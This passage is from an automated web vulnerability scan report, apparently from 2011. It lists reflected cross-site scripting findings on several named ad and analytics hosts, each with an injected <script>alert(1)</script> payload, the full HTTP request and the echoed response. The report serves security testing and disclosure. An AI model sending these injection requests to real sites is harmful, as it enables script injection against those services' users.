Cookie: BizoID=a1177894-f476-4957-80ae-6dca795c7582; BizoData=bCKmweipCYuVeaSOoxswed9Qb1MaQBj6W9sWr87GbT1F2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYRQ5ASb5kMise8Pxt51dGGWc8QDWgjPLhdOG36lSisWrtgLaaSVnj2fdRBcVnCpgzxiiGG36lSisWrtgKQAGh0CtrorNnZzJ6mTbYtlIspvrRHB8bzYus0MO9AJQ9klML90GpK80xK9r5TpCeAipqZpPwjKnistQch1TtSdCipN6mK3CUii1HWejxSM8P3E9CsIyx2KVipBsQrpnSjb2ENNS7GUK75TS3bJ0RsLv7isbmBSYVr2mcVbHisJ6ipYWnnQcsOceLYL7xBRFxKFdLqmZqVuCxNVxR9ESVdFipXOuvVwW11pRw3kybarrhisjKIfUU0elPDSis2guzkT2eqhlmJEDBn8LipG8voHPDPbDLax1KKSKoPv3akGJg07Xisj9z1YKu1NBis8T7j4VRMZDSux1LRdbvQME7fb528daHNJfkisPgGK2RSvdeUD9bvQME7fb520g33buvrQmtDwJR0SvlcgxOZOtWnisXSxxMhQn4sBPBisTo4YEiiYHam60Lr24SUTAXbskI6KiiPUqFH1r2Q7eRaFl39q8flhoInmtRaNDMdjO4e7XqdIDERIqPwhcbmvmZOisnclRRmEpGr0KwjLHYpX4NWnck1gtWcIXXLqdtszoE70KwjLHYpX4F8pJFEZG8Dt2Pkc1sv6c5ZV6jeN2HpSfUPZJTCisdBqSvNMSvaipU6QngPqmaT8Iyp5qkRIUt1qGDVcfhLmRsZN0mIUUYBnO5VrNlR3nLMBjv5Kebnoduipu3siiUTre1TcZmx61isSNkyistxBvtcbxUrwAipNN9QFd9eD26isip5kQtBufiibtDMd597JLLch9l6mETTwUEiiPsHLVMTFNsVrcrw312KlSryiiippLvHRWwTxBUSFRuufykhwWSlghzjIvVLoBhj5NDTHr2wr1kiiqD792pBiiZisWoLipipOUKipZHRipYhdFhisisWA5B16a2n9eG5TUT1qeCdvJtyU5Mwis1R9XDEmr4jQn0xip0wxgMqQ3dfX5RnYEo6pZ59VsULAqst2zss8e5HZ4551FBngKH7AQJipLd4ekU1f7MrQxrTtB1Wxn268X1nippZxuFiiipNVtwB9MTZe7RE8f0iiJGJJOisFTGPnsMVZAvvYDODnXavvaWQgiszEc0Q0ChKpQiiHyBP6e0UwPekkdYKGOaFvC2QlLeG1tBOXsjWJGU6RQpSM5WNTMfafI0saipfrtrZCipo8J7yKXisxNzbgXQvQ3ldWQZHY4kmra7WMngtuLhwCjTiioIip4aU3X1MNZy9nc9A8jsKZSw8DO8jmWc9UzGfccMWY4JCgIlY6fU8ucsHAie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 07 Mar 2011 01:39:55 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 84
Connection: keep-alive

Unknown API key: (8dn4jnyemg4ky9svqgs28wdsec0bc<script>alert(1)</script>d87256e279b)

1.52. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload 5c7fd<script>alert(1)</script>bf08636ce95 was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=8dn4jnyemg4ky9svqgs28wds&admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&callback_url=5c7fd<script>alert(1)</script>bf08636ce95 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=8308787085&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=a1177894-f476-4957-80ae-6dca795c7582; BizoData=bCKmweipCYuVeaSOoxswed9Qb1MaQBj6W9sWr87GbT1F2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYRQ5ASb5kMise8Pxt51dGGWc8QDWgjPLhdOG36lSisWrtgLaaSVnj2fdRBcVnCpgzxiiGG36lSisWrtgKQAGh0CtrorNnZzJ6mTbYtlIspvrRHB8bzYus0MO9AJQ9klML90GpK80xK9r5TpCeAipqZpPwjKnistQch1TtSdCipN6mK3CUii1HWejxSM8P3E9CsIyx2KVipBsQrpnSjb2ENNS7GUK75TS3bJ0RsLv7isbmBSYVr2mcVbHisJ6ipYWnnQcsOceLYL7xBRFxKFdLqmZqVuCxNVxR9ESVdFipXOuvVwW11pRw3kybarrhisjKIfUU0elPDSis2guzkT2eqhlmJEDBn8LipG8voHPDPbDLax1KKSKoPv3akGJg07Xisj9z1YKu1NBis8T7j4VRMZDSux1LRdbvQME7fb528daHNJfkisPgGK2RSvdeUD9bvQME7fb520g33buvrQmtDwJR0SvlcgxOZOtWnisXSxxMhQn4sBPBisTo4YEiiYHam60Lr24SUTAXbskI6KiiPUqFH1r2Q7eRaFl39q8flhoInmtRaNDMdjO4e7XqdIDERIqPwhcbmvmZOisnclRRmEpGr0KwjLHYpX4NWnck1gtWcIXXLqdtszoE70KwjLHYpX4F8pJFEZG8Dt2Pkc1sv6c5ZV6jeN2HpSfUPZJTCisdBqSvNMSvaipU6QngPqmaT8Iyp5qkRIUt1qGDVcfhLmRsZN0mIUUYBnO5VrNlR3nLMBjv5Kebnoduipu3siiUTre1TcZmx61isSNkyistxBvtcbxUrwAipNN9QFd9eD26isip5kQtBufiibtDMd597JLLch9l6mETTwUEiiPsHLVMTFNsVrcrw312KlSryiiippLvHRWwTxBUSFRuufykhwWSlghzjIvVLoBhj5NDTHr2wr1kiiqD792pBiiZisWoLipipOUKipZHRipYhdFhisisWA5B16a2n9eG5TUT1qeCdvJtyU5Mwis1R9XDEmr4jQn0xip0wxgMqQ3dfX5RnYEo6pZ59VsULAqst2zss8e5HZ4551FBngKH7AQJipLd4ekU1f7MrQxrTtB1Wxn268X1nippZxuFiiipNVtwB9MTZe7RE8f0iiJGJJOisFTGPnsMVZAvvYDODnXavvaWQgiszEc0Q0ChKpQiiHyBP6e0UwPekkdYKGOaFvC2QlLeG1tBOXsjWJGU6RQpSM5WNTMfafI0saipfrtrZCipo8J7yKXisxNzbgXQvQ3ldWQZHY4kmra7WMngtuLhwCjTiioIip4aU3X1MNZy9nc9A8jsKZSw8DO8jmWc9UzGfccMWY4JCgIlY6fU8ucsHAie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 07 Mar 2011 01:41:04 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 58
Connection: keep-alive

Unknown Referer: 5c7fd<script>alert(1)</script>bf08636ce95

1.53. http://api.dimestore.com/viapi [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.dimestore.com
Path:   /viapi

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload b0c8a<a>3637f5c2d52 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /viapi?action=pixel&id=f9622925b0c8a<a>3637f5c2d52 HTTP/1.1
Host: api.dimestore.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=5332614444&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pixel_d51770430=1

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Mon, 07 Mar 2011 00:59:52 GMT
Content-Type: text/xml
Connection: keep-alive
Set-Cookie: pixel_f9622925b0c8a<a>3637f5c2d52=1; Expires=Tue, 06-Mar-2012 00:59:52 GMT
Content-Length: 54

// DIMESTORE PIXEL OK -- f9622925b0c8a<a>3637f5c2d52

1.54. http://ar.voicefive.com/b/rc.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload f092f<script>alert(1)</script>49bca32207c was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteractionf092f<script>alert(1)</script>49bca32207c&n=ar_int_p84053757&1299459393565 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Homepage&placement=MW_HOME_300_TOP&groupid=5557007329&quantseg=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&; BMX_3PC=1; UID=2206bdab-24.143.206.75-1298208201; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 00:55:55 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteractionf092f<script>alert(1)</script>49bca32207c("");

1.55. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload c534e<script>alert(1)</script>d15bf7170c1 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8c534e<script>alert(1)</script>d15bf7170c1&c2=6135404&c3=15&c4=12005&c5=&c6=&c10=3212813&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Mar 2011 01:47:03 GMT
Date: Mon, 07 Mar 2011 01:47:03 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8c534e<script>alert(1)</script>d15bf7170c1", c2:"6135404", c3:"15", c4:"12005", c5:"", c6:"", c10:"3212813", c15:"", c16:"", r:""});

1.56. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 75841<script>alert(1)</script>a90132d1976 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12005&c5=&c6=&c10=321281375841<script>alert(1)</script>a90132d1976&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Mar 2011 01:47:09 GMT
Date: Mon, 07 Mar 2011 01:47:09 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"12005", c5:"", c6:"", c10:"321281375841<script>alert(1)</script>a90132d1976", c15:"", c16:"", r:""});

1.57. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload beb29<script>alert(1)</script>35101d2c181 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12005&c5=&c6=&c10=3212813&c15=beb29<script>alert(1)</script>35101d2c181 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Mar 2011 01:47:10 GMT
Date: Mon, 07 Mar 2011 01:47:10 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"12005", c5:"", c6:"", c10:"3212813", c15:"beb29<script>alert(1)</script>35101d2c181", c16:"", r:""});

1.58. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload fdeb6<script>alert(1)</script>18adce1c522 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404fdeb6<script>alert(1)</script>18adce1c522&c3=15&c4=12005&c5=&c6=&c10=3212813&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Mar 2011 01:47:04 GMT
Date: Mon, 07 Mar 2011 01:47:04 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404fdeb6<script>alert(1)</script>18adce1c522", c3:"15", c4:"12005", c5:"", c6:"", c10:"3212813", c15:"", c16:"", r:""});

1.59. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 99c56<script>alert(1)</script>ef484687d18 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=1599c56<script>alert(1)</script>ef484687d18&c4=12005&c5=&c6=&c10=3212813&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Mar 2011 01:47:05 GMT
Date: Mon, 07 Mar 2011 01:47:05 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"1599c56<script>alert(1)</script>ef484687d18", c4:"12005", c5:"", c6:"", c10:"3212813", c15:"", c16:"", r:""});

1.60. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 919e4<script>alert(1)</script>921de2591d1 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12005919e4<script>alert(1)</script>921de2591d1&c5=&c6=&c10=3212813&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Mar 2011 01:47:06 GMT
Date: Mon, 07 Mar 2011 01:47:06 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"12005919e4<script>alert(1)</script>921de2591d1", c5:"", c6:"", c10:"3212813", c15:"", c16:"", r:""});

1.61. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload ba08c<script>alert(1)</script>3eeb0c57d13 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12005&c5=ba08c<script>alert(1)</script>3eeb0c57d13&c6=&c10=3212813&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Mar 2011 01:47:07 GMT
Date: Mon, 07 Mar 2011 01:47:07 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"12005", c5:"ba08c<script>alert(1)</script>3eeb0c57d13", c6:"", c10:"3212813", c15:"", c16:"", r:""});

1.62. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload ed75e<script>alert(1)</script>15cdaeb4955 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12005&c5=&c6=ed75e<script>alert(1)</script>15cdaeb4955&c10=3212813&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Mar 2011 01:47:08 GMT
Date: Mon, 07 Mar 2011 01:47:08 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
omscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"12005", c5:"", c6:"ed75e<script>alert(1)</script>15cdaeb4955", c10:"3212813", c15:"", c16:"", r:""});

1.63. http://b3.mookie1.com/2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13f03"><script>alert(1)</script>26e9f608a62 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/IIIInteractiveB313f03"><script>alert(1)</script>26e9f608a62/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=5623/387/1;s=256;d=7;w=160;h=600
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; id=3375925924; session=1299459588|1299459588; NSC_o4efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; Dell=MaxpointB3

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:47:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/IIIInteractiveB313f03"><script>alert(1)</script>26e9f608a62/ATTW/1H_11Q1/ROSIP/160/1549359825/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

